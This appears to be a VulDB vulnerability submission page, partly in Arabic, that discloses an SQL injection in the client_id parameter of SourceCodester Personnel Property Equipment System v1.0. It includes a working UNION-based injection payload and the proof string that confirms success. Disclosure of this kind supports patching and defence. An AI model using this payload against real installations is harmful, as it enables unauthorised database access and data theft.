إرسال #156110: Personnel Property Equipment System v1.0 /PPES/admin/returned_reuse_form.php GET parameter client_id exists SQL injection vulnerabilityالمعلومات

عنوانPersonnel Property Equipment System v1.0 /PPES/admin/returned_reuse_form.php GET parameter client_id exists SQL injection vulnerability
الوصفPersonnel Property Equipment System v1.0 has SQL injection. Vulnerability File: /PPES/admin/returned_reuse_form.php GET parameter "client_id" exists SQL injection vulnerability Payload1: client_id=-1' union all select null,null,null,null,concat(0x5152535556,0x666768),null,null,null-- -&dep_id=17&item_id=27 The UNION query is successful, and the expected string "QRSVfgh" appears, which proves that there is a SQL injection vulnerability.
المصدر⚠️ https://github.com/LeozhangCA/CVEReport/blob/main/SQL.md
المستخدم
 LeoZhangCA (UID 46757)
ارسال13/05/2023 01:00 PM (3 سنوات منذ)
الاعتدال14/05/2023 09:44 AM (21 hours later)
الحالةتمت الموافقة
إدخال VulDB228971 [SourceCodester Personnel Property Equipment System 1.0 GET Parameter returned_reuse_form.php client_id حقن SQL]
النقاط20

التالي نظرة عامة السابق

Do you need the next level of professionalism?

Upgrade your account now!